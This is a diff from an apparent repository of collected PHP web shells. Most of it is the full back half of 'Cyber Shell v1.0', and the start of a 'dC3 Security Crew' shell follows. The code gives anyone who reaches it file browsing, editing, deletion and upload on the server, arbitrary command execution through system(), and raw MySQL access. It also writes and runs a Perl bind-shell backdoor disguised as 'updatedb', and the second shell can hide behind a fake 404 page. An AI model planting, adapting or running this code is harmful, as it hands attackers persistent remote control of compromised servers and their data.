+$showdir.="<a href='$php_self?d=$bufdir&show'>$buf[$i]/</a>";
+$bufdir.="/";
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz]))
+echo <<< EOF
+<title>$d</title>
+<style type="text/css">
+body,td,th 
+{
+	font-family: Fixedsys;
+            font-family: "Times New Roman", Times, serif;
+	font-size: 0.4cm;
+	color: #444444;
+}
+body 
+{
+	background-color: #EEEEEE;
+}
+
+.style3 {
+	font-size: 1.5cm;
+	font-family: "Comic Sans MS";
+}
+.style4 {color: #FFFFFF}
+.style5 {color: #0000FF}
+.style6 {color: #FFFF00}
+.style7 {color: #CCCCCC}
+.style8 {color: #FF00FF}
+.style9 {color: #00FF00}
+.style10 {color: #00FFFF}
+</style>
+$style
+<table border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#999999">
+<tr height="10">
+<td align="center" bordercolor="#000000" bgcolor="#FFFFFF">
+<div style="background-color:#FFFFF0">$showdir</div>
+EOF;
+
+function perms($file) 
+{ 
+$mode=fileperms($file);
+if( $mode & 0x1000 ) 
+$type='p';
+else if( $mode & 0x2000 ) 
+$type='c'; 
+else if( $mode & 0x4000 ) 
+$type='d'; 
+else if( $mode & 0x6000 ) 
+$type='b'; 
+else if( $mode & 0x8000 ) 
+$type='-';
+else if( $mode & 0xA000 ) 
+$type='l'; 
+else if( $mode & 0xC000 ) 
+$type='s'; 
+else 
+$type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function updir($dir){
+if (strlen($dir)>2){
+for ($i=1; $i<strlen($dir); $i++) {
+if (($dir[strlen($dir)-$i]=="/") or  ($dir[strlen($dir)-$i]=="\\"))
+return substr($dir,0,strlen($dir)-$i);}} 
+else return $dir;
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz])){
+$backdir=updir($d);
+echo <<< EOF
+<table width="505" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFFFF0" style="height:30px;background-image: url($PHP_SELF?imgname=bg); background-position: center; background-repeat: repeat-x;">
+  <tr height="15">
+    <td onClick='location.href="$PHP_SELF?d=$backdir&show"' width="20%" align="center">
+�����
+    </td>
+    <td onClick='location.href="javascript:history.back(-1)"' width="20%" align="center">
+�����
+    </td>
+    <td onClick='location.href="$PHP_SELF"'  width="20%" align="center">
+� ������
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&tools"'  width="20%" align="center">
+�����������
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&show"'  width="20%" align="center">
+� ������
+    </td>
+  </tr>
+</table>
+EOF;
+
+$free = countbyte(diskfreespace("./"));
+if (!empty($free)) echo "��������� �������� ������������ : <font face='Tahoma' size='1' color='#000000'>$free</font><br>";
+$os=exec("uname");
+if (!empty($os)) echo "������� :".$os."<br>";
+if (!empty($REMOTE_ADDR)) echo "��� IP: <font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font><br>";
+$ghz=exec("cat /proc/cpuinfo | grep GHz");
+if (!empty($ghz)) echo "���� � ������:(GHz)".$ghz."<br>";
+$mhz=exec("cat /proc/cpuinfo | grep MHz");
+if (!empty($mhz)) echo "���� � ������:(MHz) ".$mhz."<br>";
+$my_id=exec("id");
+if (!empty($my_id)) echo "<div style=\"background-color:#000000\"><span class=\"style4\">������������:".$my_id."</span></div>";
+}
+
+function showdir($df) {
+$df=str_replace("//","/",$df);
+$dirs=array();
+$files=array();
+if ($dir=opendir($df)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$df/$file")){
+$dirs[]=$file;}
+else {
+$files[]=$file;}}}
+closedir($dir);
+sort($dirs);
+sort($files);
+echo <<< EOF
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+EOF;
+for ($i=0; $i<count($dirs); $i++){
+$perm=perms("$df/$dirs[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?d=$df/$dirs[$i]&show"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=dir></a></span></td>
+    <td width="241" bgcolor="#FFFFF0"><a href="$PHP_SELF?d=$df/$dirs[$i]&show">$dirs[$i]</a></td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?deldir=$df/$dirs[$i]/">�������</a></td>
+    <td width="51" align="center" bgcolor="#EFFFFF"><span class="style8"><center>�������</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF0">$perm</td>
+  </tr>
+EOF;
+}
+for ($i=0; $i<count($files); $i++) {
+$attr="";
+if (!$fi=@fopen("$df/$files[$i]","r+")){
+$attr=" ONLY_READ ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]&readonly\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if (!$fi=@fopen("$df/$files[$i]","r")){
+$attr=" Can't_READ ";
+$read="";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if ($attr==""){
+$attr=" READ/WRITE ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";
+}
+$perm=perms("$df/$files[$i]");
+$it="file";
+switch (ext($files[$i])) {
+case ".txt": $it="txt"; break;
+case ".php": $it="txt"; break;
+case ".htm": $it="txt"; break;
+case ".log": $it="txt"; break;
+case ".pl": $it="txt"; break;
+case ".asm": $it="txt"; break;
+case ".bat": $it="txt"; break;
+case ".bash_profile": $it="txt"; break;
+case ".bash_history": $it="txt"; break;
+case ".ini": $it="txt"; break;
+case ".php3": $it="txt"; break;
+case ".html": $it="txt"; break;
+case ".cgi": $it="txt"; break;
+case ".inc": $it="txt"; break;
+case ".c": $it="txt"; break;
+case ".cpp": $it="txt"; break;
+}
+$fsize = fsize("$df/$files[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?downloadfile=$df/$files[$i]"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=$it></a></span></td>
+    <td width="241" bgcolor="#00FFFF"><a$read>$files[$i] </a> ($fsize)</td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?rename=1&filetorename=$files[$i]&d=$df&diz">ren</a>/<a$write>del</a>/<a href="$PHP_SELF?downloadfile=$df/$files[$i]">get</a>/<a href="$PHP_SELF?mailfile=$df/$files[$i]">mail</a></td>
+    <td width="51" align="center" bgcolor="#FFEFEF"><span class="style8"><center>$attr</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF9">$perm</td>
+  </tr>
+EOF;
+}
+echo "</table>";
+if (count($dirs)==0 && count($files)==0){
+echo <<< EOF
+<table width="505" height="24" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+  <tr>
+    <td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">����� �����</td>
+  </tr>
+</table>
+EOF;
+}}
+
+$edit=$_REQUEST[edit];
+if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
+$file=fopen($edit,"r") or die ("��� ������� � ����� $edit");
+if (filesize($edit) > 0)
+$tfile=fread($file,filesize($edit)) or die ("��� ������� � ����� $edit");
+else $tfile = "";
+fclose($file);
+$tfile = htmlspecialchars($tfile,ENT_QUOTES);
+echo "
+<center>
+<form  action=\"$PHP_SELF\" method=\"POST\">";
+$mydir=updir($edit);
+echo "
+<a href=\"$PHP_SELF?d=$mydir&show\">��������� � $mydir/</a><br>
+�� ������������ ���� : $edit<br>
+<a href=\"$PHP_SELF?edit=$edit&ashtml\"><span class=\"style4\">����������� ���� ���� � ���� HTML</span></a>
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+<textarea name=\"texoffile\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$tfile</textarea>
+<br><input type=\"hidden\" name=\"nameoffile\" value=\"$edit\" >
+";
+if (!isset($_REQUEST[readonly]))
+echo "<input type=\"submit\"  value=\"            ���������            \" >";
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</form>
+</center>
+";
+}
+if (isset($edit) && (!empty($edit)) && (isset($ashtml))){
+$mydir=updir($edit);
+echo "
+<center>
+<a href=\"$PHP_SELF?d=$mydir&show\">��������� � $mydir/</a><br>
+�� �������������� ���� : $edit
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+";
+readfile($edit);
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</center>
+";
+}
+
+if (isset($texoffile) && isset($nameoffile))
+{
+$texoffile=unbug($texoffile);
+$f = fopen("$nameoffile", "w") or die ("��� ������� � ����� $nameoffile");
+fwrite($f, "$texoffile");
+fclose($f);
+$mydir=updir($nameoffile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&show\">";
+die;
+}
+
+if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!=""))
+{
+$delfile=$_REQUEST[delfile];
+$mydir=updir($delfile);
+$deleted = unlink("$delfile");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+function deletedir($directory) {
+if ($dir=opendir($directory)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$directory/$file"))  {
+deletedir($directory."/".$file);} 
+else {unlink($directory."/".$file);}}}
+closedir($dir);
+rmdir("$directory/$file");
+}
+if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){
+$deldir=$_REQUEST[deldir];
+$mydir=updir(updir($deldir));
+deletedir("$deldir");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+if (isset($show)){showdir("$d");}
+
+{
+if (isset($_REQUEST[tools]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+.: �������� ��� ������ ����� :.
+</td>
+</tr>
+</table>
+</center>
+EOF;
+if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: ������� ����� :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=tools>
+<input type=text size=55 name=newdir value="$d/����� �����">
+<input type=submit value="�������">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newdir) && ($newdir!=""))
+{
+$mydir=updir($newdir);
+mkdir($newdir,"7777");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if(@$_GET['rename']){
+echo "<b><font color=green>RENAME $d/$filetorename ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$filetorename</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$filetorename'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+@$rto=$_POST['rto'];
+if($rto){
+$fr1=$d."/".$filetorename;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+rename($fr1,$to1);
+echo "File <br><b>$filetorename</b><br>Renamed to <b>$rto</b><br><br>";
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=$PHP_SELF?d=$d&show\">";}
+echo $copyr;
+exit;
+}
+
+if (isset($tools) or isset($tmkfile))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: ������� ���� :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=text size=55 name=newfile value="$d/newfile.php">
+<input type=hidden name=tools>
+<input type=submit value="�������">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newfile) && ($newfile!="")){
+$f = fopen("$newfile", "w+");
+fwrite($f, "");
+fclose($f);
+$mydir=updir($newfile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if (isset($tools) or isset($tbackdoor))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: ������� ���� :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+��� �������: <input type=text size=13 name=bfileneme value="bind.pl"> ����: <input type=text size=10 name=bport value="65426">
+<input type="hidden" name="d" value="$d" >
+<input type=hidden name=tools>
+<input type=submit value="���������">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){
+$script="
+#!/usr/bin/perl
+\$port = $bport; 
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+\$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";
+
+$f = fopen("$d/$bfileneme", "w+");
+fwrite($f, $script);
+fclose($f);
+system("perl $d/$bfileneme");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$d&show\">";
+}
+
+if (isset($tools) or isset($tbash))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="GET">
+<input type="hidden" name="d" value="$d" >
+.: ��������� ������� :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=diz>
+<input type=hidden name=tbash>
+<input type=text size=55 name=cmd value="$cmd">
+<input type=submit value="���������">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($cmd) && ($cmd!="")){
+echo "<pre><div align=\"left\">";
+system($cmd);
+echo "</div></pre>";
+}
+
+if (isset($tools) or isset($tupload)){
+$updir="$d/"; 
+if(empty($go)) {
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form ENCTYPE="multipart/form-data"  action="$PHP_SELF" method="post">
+.: �������� ���� � ������� ������� :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<INPUT NAME="userfile" TYPE="file" SIZE="40">
+<input type="hidden" name="d" value="$d">
+<input type=hidden name=diz>
+<input type=hidden name=tupload>
+<input type="submit" name=go value="���������">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+}
+else {
+if (is_uploaded_file($userfile)) { 
+$fi = "������� ���� $userfile_name �������� $userfile_size ���� � ���������� $updir";
+}
+echo "$fi<br><a href='$PHP_SELF?d=$d&show&tupload'>����� � ��������</a>";
+}
+if (is_uploaded_file($userfile)) {
+$dest=$updir.$userfile_name;
+move_uploaded_file($userfile, $dest);
+}}
+
+if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass))  ){
+mysql_connect($db_server, $db_user, $db_pass) or die("�� ���� ������������ � ����");
+}
+
+if ((isset($dbname)) and (isset($table)) )
+{
+foreach($_POST as $var => $val)
+if (substr($var,0,7) == 'newpole'){
+if (substr($var,7,strlen($var)) !== ''){
+$indif=substr($var,7,strlen($var));
+echo " $val ";
+mysql_select_db($dbname) or die("�� ���� ������� ���� ������");
+if ($xvar == "") 
+$xvar .= $indif;
+else
+$xvar .= ",".$indif;
+if ($xval == "") 
+$xval .= "'$val'";
+else
+$xval .= ",'$val'";
+}}
+
+if ($xvar != ""){
+mysql_query("INSERT INTO $table ($xvar) values ($xval)");
+}
+
+echo "<a href=$PHP_SELF?showtables=$dbname&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>����� � ������ ������ ��:$dbname</a>";
+mysql_select_db($dbname) or die("�� ���� ������� ���� ������");
+$re=mysql_query("select * from $table");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+$param="limit $_SESSION[limit]";
+
+$re=mysql_query("select * from $table $param");
+
+while($res=mysql_fetch_array($re)){
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if (!$pixidname){
+$pixidname=$var;
+$pixid=$val;
+}
+if ($nvar == 128945432){
+$valtext=untag($val);
+if ($valtext == "") $valtext="=�����=";
+
+
+if ($_SESSION[lenth] == "on"){
+if (strlen($valtext)>40){
+$valtext=substr($valtext,0,40);
+$valtext .="...";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&var=$var&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$valtext</a></td>";
+}}
+
+echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass&del>�������</a></td></tr>";
+$pixidname='';
+$pixid='';
+}
+
+echo "<form  action=\"$PHP_SELF\" method=\"POST\">";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#FFFFFF' bordercolor='#FFFFFF'><center><input type='text' name='newpole$var' value='$var' size='5'></center></td>";
+}}
+echo "</tr>";
+echo "</table>";
+echo "<input type=\"submit\"  value=\"�������� ����� ������\" >";
+echo "
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\">
+<input type=\"hidden\" name=\"table\" value=\"$table\">
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+";
+echo "</form>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
+echo "hello";
+mysql_select_db($dbname) or die("�� ���� ������� ���� ������");
+mysql_query("delete from $mtable where $pixidname='$pixid'");
+echo "<head><meta http-equiv=\"refresh\" content=\"0;URL=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass\"></head>";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
+mysql_select_db($dbname) or die("�� ���� ������� ���� ������");
+mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
+mysql_select_db($dbname) or die("�� ���� ������� ���� ������");
+$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
+$res=mysql_fetch_array($re);
+$text=untag($res[$var]);
+
+echo "
+<form  action=\"$PHP_SELF\" method=\"POST\">
+<textarea name=\"textofmysql\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$text</textarea>
+<input type=\"hidden\" name=\"dbname\" value=\"$dbname\" >
+<input type=\"hidden\" name=\"mtable\" value=\"$mtable\" >
+<input type=\"hidden\" name=\"var\" value=\"$var\" >
+<input type=\"hidden\" name=\"pixidname\" value=\"$pixidname\" >
+<input type=\"hidden\" name=\"pixid\" value=\"$pixid\" >
+<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
+<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
+<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
+<br><input type=\"submit\"  value=\"            ��������            \" >
+</form>
+<a href=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>��������� � ������</a>
+";
+}
+
+if (isset($showdb) && empty($showtables)){
+$re=mysql_query("show databases");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>������ ��������� ��:</span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?showtables=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></center></td></tr>";
+}
+echo "</table>";
+}
+if (isset($showtables) and !empty($showtables)){
+
+if (isset($xlimit)){
+$_SESSION[limit]=$xlimit;
+if (isset($xlenth))
+$_SESSION[lenth]=$xlenth;
+else $_SESSION[lenth]="";
+}
+
+echo "<a href=$PHP_SELF?showdb&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>����� � ������ ��</a>";
+$re=mysql_query("SHOW TABLES FROM $showtables");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>$showtables - ������ ������: </span></div></center></td></tr>";
+while($res=mysql_fetch_array($re)){
+echo "<tr><td><center><a href=$PHP_SELF?dbname=$showtables&table=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></td></tr>";
+}
+echo "</table>";
+
+if (($_SESSION[lenth]) == "on")
+$ch="checked";
+else
+$ch="";
+
+echo <<< EOF
+<form  action="$PHP_SELF" method="get">
+<input type="hidden" name="showtables" value="$showtables" >
+<input type="hidden" name="db_server" value="$db_server" >
+<input type="hidden" name="db_user" value="$db_user" >
+<input type="hidden" name="db_pass" value="$db_pass" >
+����������� �� ���������� ��������� �����:<br>
+<select name="xlimit">
+  <option value="0">&#1055;&#1086;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1090;&#1100; &#1074;&#1089;&#1105;</option>
+  <option value="10">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 10</option>
+  <option value="20">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 20</option>
+  <option value="30">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 30</option>
+  <option value="50">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 50</option>
+  <option value="100">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 100</option>
+  <option value="200">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 200</option>
+  <option value="500">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 500</option>
+  <option value="1000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 1000</option>
+  <option value="5000">&#1055;&#1077;&#1088;&#1074;&#1099;&#1077; 5000</option>
+</select>
+<br>�������� ����������� �� ����� ��������� ����� <input name="xlenth" type="checkbox" value="on" $ch><br>
+<input type="submit"  value="���������" >
+EOF;
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+echo "<br>������� �����������: $_SESSION[limit]";
+}
+
+if (isset($tools) or isset($tmysql))
+echo "
+<center>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCCC'>
+<tr height='10'>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFF8FF'>
+.: MySQL :.
+</td>
+</tr height='10'>
+<tr>
+<td align='center' bordercolor='#ECE9D8' bgcolor='#FFFFFF'>
+<form name='zapros' method='get' action=''>
+<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Host
+</td>
+<td>
+<input name='db_server' type='text' value='localhost'>
+</td>
+</tr>
+<tr align='center' >
+<td>
+Login MySQL
+</td> 
+<td>
+<input type='text' name='db_user' value=''> 
+</tr>
+<tr align='center' >
+<td>
+Password MySQL
+</td> 
+<td>
+<input type='text' name='db_pass' value=''>
+<input type='hidden' name='showdb'>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+��� �� (�� �����������)
+</td> 
+<td>
+<input type='text' name='showtables' value=''>
+</td> 
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+<td>
+<input type='reset'>
+</td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+</center>
+";
+}
+echo <<< EOF
+<center>.:Cyber Shell (v 1.0):.<br>Copyright � <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</a>, 2002-2006</center>
+</td>
+</tr>
+</table>
+EOF;
+
+$d=tourl($d);
+echo "
+<center>
+<span class='style1'>
+<a href=$PHP_SELF?d=$d&diz&tmkdir>.: ������� ����� :.</a>
+<a href=$PHP_SELF?d=$d&diz&tmkfile>.: ������� ���� :.</a>
+<a href=$PHP_SELF?d=$d&diz&tbackdoor>.: ������� ���� ��� ����������� :.</a><br>
+<a href=$PHP_SELF?d=$d&diz&tbash>.: Bash :.</a>
+<a href=$PHP_SELF?d=$d&diz&tupload>.: �������� ���� :.</a>
+</span>
+</center>
+";
+}
+die;
+?>
diff --git a/xakep-shells/PHP/dC3 Security Crew Shell PRiV.php.txt b/xakep-shells/PHP/dC3 Security Crew Shell PRiV.php.txt
new file mode 100644
index 0000000..e99383d
--- /dev/null
+++ b/xakep-shells/PHP/dC3 Security Crew Shell PRiV.php.txt	
@@ -0,0 +1,1273 @@
+<?PHP
+/* 
+ver=5
+----------------------Only For Priv8 Use---------------------------------
+               I dont support illegal actions!
+-------------------------------------------------------------------------
+          dC3 Security Crew
+-------------------------------------------------------------------------
+By turning "on" safe you can make your shell in 404 Not Find mode if the user doesnt know your OWN set word!
+-------------------------------------------------------------------------
+Shell written by Bl0od3r
+-------------------------------------------------------------------------
+Easy file managing with a lot of features!
+-------------------------------------------------------------------------
+In work:
+special file options
+-------------------------------------------------------------------------
+*/
+//important
+error_reporting(5);
+@ignore_user_abort(true);
+//
+
+$safe="off";
+$word="secret";
+if ($safe=="on") {
+if (!isset($_GET[$word])) {
+   header('HTTP/1.0 404 Not Found');
+   exit;
+   }
+ }
+$made_by="Bl0od3r";
+$of="Netplayazz";
+($made_by=="Bl0od3r") ? $fake=0 : $fake=1;
+($of=="dc3") ? $fake=0 :  $fake=1;
+$st_dir=".";
+$p=str_replace("\\","/",realpath($_GET['file']));
+$j_d=$_GET['file'];
+$j_f=$_GET['file'];
+$filename = $_GET['file'];
+$file_info = pathinfo($filename);
